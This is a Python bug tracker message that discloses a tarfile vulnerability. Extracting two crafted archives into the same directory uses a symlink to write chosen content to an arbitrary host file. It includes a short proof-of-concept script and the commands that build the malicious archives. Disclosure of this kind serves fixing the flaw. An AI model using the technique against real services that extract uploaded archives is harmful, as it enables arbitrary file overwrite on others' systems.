Author leveryd
Recipients leveryd
Date 2021-05-03.17:44:03
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1620063843.8.0.514260137969.issue44023@roundup.psfhosted.org>
In-reply-to
Content
if uncompress file twice to the same dir, attacker can "write any content to any file on the host"".

poc code like below:
```
import tarfile


dir_name = "/tmp/anything"
file1_name = "/tmp/a.tar.gz"  # ln -sv /tmp/a test_tar/a;tar -cvf a.tar.gz test_tar/a
file2_name = "/tmp/b.tar.gz"  # echo "it is just poc" > /tmp/payload; rm -rf test_tar; cp /tmp/payload test_tar/a;tar -cvf b.tar.gz test_tar/a


def vuln_tar(tar_path):
	"""
	:param tar_path:
	:return:
	"""
	import tarfile
	tar = tarfile.open(tar_path, "r:tar")
	file_names = tar.getnames()
	for file_name in file_names:
	    tar.extract(file_name, dir_name)
	tar.close()


vuln_tar(file1_name)
vuln_tar(file2_name)
```

in this poc code, if one service uncompress tar file which is uploaded by attacker to "dir_name" twice, attacker can create "/tmp/a" and write "it is just poc" string into "/tmp/a" file.
History
Date User Action Args
2021-05-03 17:44:03leverydsetrecipients: + leveryd
2021-05-03 17:44:03leverydsetmessageid: <1620063843.8.0.514260137969.issue44023@roundup.psfhosted.org>
2021-05-03 17:44:03leverydlinkissue44023 messages
2021-05-03 17:44:03leverydcreate